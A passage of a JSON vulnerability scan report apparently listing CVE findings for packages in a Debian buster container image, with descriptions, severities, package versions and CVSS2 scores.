{"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-17543", "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states \"only a few specific / uncommon usages of the API are at risk.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17543", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.3-1+deb10u1"}, {"key": "package_name", "value": "lz4"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2013-0337", "description": "The default configuration of nginx, possibly 1.3.13 and earlier, uses world-readable permissions for the (1) access.log and (2) error.log files, which allows local users to obtain sensitive information by reading the files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0337", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-7169", "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used \"group blacklisting\" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-7169", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-37600", "description": "An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-37600", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.33.1-0.1"}, {"key": "package_name", "value": "util-linux"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2011-3374", "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3374", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.8.2.3"}, {"key": "package_name", "value": "apt"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-18276", "description": "An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support \"saved UID\" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use \"enable -f\" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-18276", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "5.0-4"}, {"key": "package_name", "value": "bash"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "7.2"}]}, {"name": "CVE-2017-18018", "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX \"-R -L\" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-18018", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "8.30-3"}, {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2021-22923", "description": "When curl is instructed to get content using the metalink feature, and a user name and password are used to download the metalink XML file, those same credentials are then subsequently passed on to each of the servers from which curl will download or try to download the contents from. Often contrary to the user''s expectations and intentions and without telling the user it happened.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22923", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-22922", "description": "When curl is instructed to download content using the metalink feature, thecontents is verified against a hash provided in the metalink XML file.The metalink XML file points out to the client how to get the same contentfrom a set of different URLs, potentially hosted by different servers and theclient can then download the file from one or several of them. In a serial orparallel manner.If one of the servers hosting
-  the contents has been breached and the contentsof the specific file on that server is replaced with a modified payload, curlshould detect this when the hash of the file mismatches after a completeddownload. It should remove the contents and instead try getting the contentsfrom another URL. This is not done, and instead such a hash mismatch is onlymentioned in text and the potentially malicious content is kept in the file ondisk.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22922", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2013-0340", "description": "expat 2.1.0 and earlier does not properly handle entities expansion unless an application developer uses the XML_SetEntityDeclHandler function, which allows remote attackers to cause a denial of service (resource consumption), send HTTP requests to intranet servers, or read arbitrary files via a crafted XML document, aka an XML External Entity (XXE) issue.  NOTE: it could be argued that because expat already provides the ability to disable external entity expansion, the responsibility for resolving this issue lies with application developers; according to this argument, this entry should be REJECTed, and each affected application would need its own CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0340", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.2.6-2+deb10u1"}, {"key": "package_name", "value": "expat"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-1010023", "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2010-4051", "description": "The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a \"RE_DUP_MAX overflow.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4051", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-1010022", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2010-4052", "description": "Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4052", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-1010024", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate \"this is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2010-4756", "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4756", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name": "CVE-2019-1010025", "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor''s position is \"ASLR bypass itself is not a vulnerability.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2018-20796", "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by ''(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+'' in grep.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-20796", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-9192", "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by ''(|)(\\\\1\\\\1)*'' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9192", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2011-3389", "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a \"BEAST\" attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3389", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "3.6.7-4+deb10u7"}, {"key": "package_name", "value": "gnutls28"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2021-30535", "description": "Double free in ICU in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-30535", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "63.1-6+deb10u1"}, {"key": "package_name", "value": "icu"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2017-9937", "description": "In LibTIFF 4.0.8, there is a memory malloc failure in tif_jbig.c. A crafted TIFF document can lead to an abort resulting in a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9937", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.1-3.1"}, {"key": "package_name", "value": "jbigkit"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-5709", "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable \"dbentry->n_key_data\" in kadmin/dbutil/dump.c that
-  can store 16-bit data but unknowingly the developer has assigned a \"u4\" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-5709", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-36222", "description": "ec_verify in kdc/kdc_preauth_ec.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.4 and 1.19.x before 1.19.2 allows remote attackers to cause a NULL pointer dereference and daemon crash. This occurs because a return value is not properly managed in a certain situation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36222", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2004-0971", "description": "The krb5-send-pr script in the kerberos5 (krb5) package in Trustix Secure Linux 1.5 through 2.1, and possibly other operating systems, allows local users to overwrite files via a symlink attack on temporary files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2004-0971", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2018-6829", "description": "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly, improperly encodes plaintexts, which allows attackers to obtain sensitive information by reading ciphertext data (i.e., it does not have semantic security in face of a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not hold for Libgcrypt''s ElGamal implementation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-6829", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2018-11813", "description": "libjpeg 9c has a large loop because read_pixel in rdtarga.c mishandles EOF.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-11813", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-17541", "description": "Libjpeg-turbo all version have a stack-based buffer overflow in the \"transform\" component. A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-17541", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2017-15232", "description": "libjpeg-turbo 1.5.2 has a NULL Pointer Dereference in jdpostct.c and jquant1.c via a crafted JPEG file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-15232", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-14048", "description": "An issue has been found in libpng 1.6.34. It is a SEGV in the function png_free_data in png.c, related to the recommended error handling for png_read_image.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14048", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-6129", "description": "** DISPUTED ** png_create_info_struct in png.c in libpng 1.6.36 has a memory leak, as demonstrated by pngcp. NOTE: a third party has stated \"I don''t think it is libpng''s job to free this buffer.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-6129", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-14550", "description": "An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14550", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-9893", "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9893", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.3.3-4"}, {"key": "package_name", "value": "libseccomp"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-1000654", "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-1000654", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.13-3"}, {"key": "package_name", "value": "libtasn1-6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.1"}]}, {"name": "CVE-2016-9085", "description": "Multiple integer overflows in libwebp allows attackers to have unspecified impact via unknown vectors.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9085", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "0.6.1-2+deb10u1"}, {"key": "package_name", "value": "libwebp"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2015-9019", "description": "In libxslt 1.1.29 and earlier, the EXSLT math.random function was not initialized with a random seed during startup, which could cause usage of this function to produce predictable outputs.", "uri": "https://security-tracker.debian.org/tracker/CVE-2015-9019", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.32-2.2~deb10u1"}, {"key": "package_name", "value": "libxslt"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2009-4487", "description": "nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window''s title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.", "uri": "https://security-tracker.debian.org/tracker/CVE-2009-4487", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-15719", "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-15719", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name": "CVE-2015-3276", "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", "uri": "https://security-tracker.debian.org/tracker/CVE-2015-3276", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2017-14159", "description": "slapd in
-  OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a \"kill `cat /pathname`\" command, as demonstrated by openldap-initscript.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-14159", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2017-17740", "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17740", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2010-0928", "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a \"fault-based attack.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-0928", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.1d-0+deb10u6"}, {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name": "CVE-2007-6755", "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain \"skeleton key\" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values.  NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-6755", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.1.1d-0+deb10u6"}, {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2017-7246", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-7246", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-20838", "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20838", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-7245", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-7245", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2017-16231", "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16231", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2017-11164", "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-11164", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.8"}]}, {"name": "CVE-2011-4116", "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-4116", "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "5.28.1-6+deb10u1"}, {"key": "package_name", "value": "perl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-19882", "description": "shadow 4.8, in certain circumstances affecting at least 